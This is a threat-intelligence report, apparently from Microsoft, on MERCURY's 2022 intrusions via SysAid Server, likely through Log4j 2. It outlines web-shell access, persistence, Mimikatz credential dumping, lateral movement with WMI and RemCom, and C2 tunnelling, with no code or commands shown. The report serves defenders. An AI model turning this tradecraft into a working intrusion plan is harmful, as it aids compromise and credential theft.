MERCURY Leveraging Log4j 2 Vulnerabilities in Unpatched Systems to Target Israeli Organizations
On July 23 and 25, 2022, MERCURY was observed using exploits against vulnerable SysAid Server instances as its initial access vector. Based on observations from past campaigns and vulnerabilities found in the targets’ environment, Microsoft assess that the exploits used were most likely related to Log4j 2. The threat actor leveraged Log4j 2 exploits against VMware applications earlier in 2022 and likely looked for similarly vulnerable internet-facing apps. SysAid, which provides IT management tools, might have presented as an attractive target for its presence in the targeted country.
Exploiting SysAid successfully enables the threat actor to drop and leverage web shells to execute several commands, as displayed in the table below. Most commands are related to reconnaissance, with one encoded PowerShell that downloads the actor’s tool for lateral movement and persistence.
Once MERCURY has obtained access to the target organization, the threat actor establishes persistence using several methods, including:
- Dropping a web shell, providing effective and continued access to the compromised device.
- Adding a user and elevating its privileges to local administrator.
- Adding the leveraged tools in the startup folders and ASEP registry keys, ensuring their persistence upon device reboot.
- Stealing credentials
The actor leverages the new local administrator user to connect through remote desktop protocol (RDP). During this session, the threat actor dumps credentials by leveraging the open-source application Mimikatz. We also observed MERCURY later performing additional credential dumping in SQL servers to steal other high privileged accounts, like service accounts.
We observed MERCURY further using its foothold to compromise other devices within the target organizations by leveraging several methods, such as:
- Windows Management Instrumentation (WMI) to launch commands on devices within organizations
- Remote services (leveraging RemCom tool) to run encoded PowerShell commands within organizations
Most of the commands launched are meant to install tools on targets or perform reconnaissance to find domain administrator accounts.
Throughout the attack, the threat actor used different methods to communicate with their command-and-control (C2) server, including:
- Built-in operating system tools such as PowerShell
- Tunnelling tool called vpnui.exe, a unique version of the open-source tool Ligolo
- Remote monitoring and management software called eHorus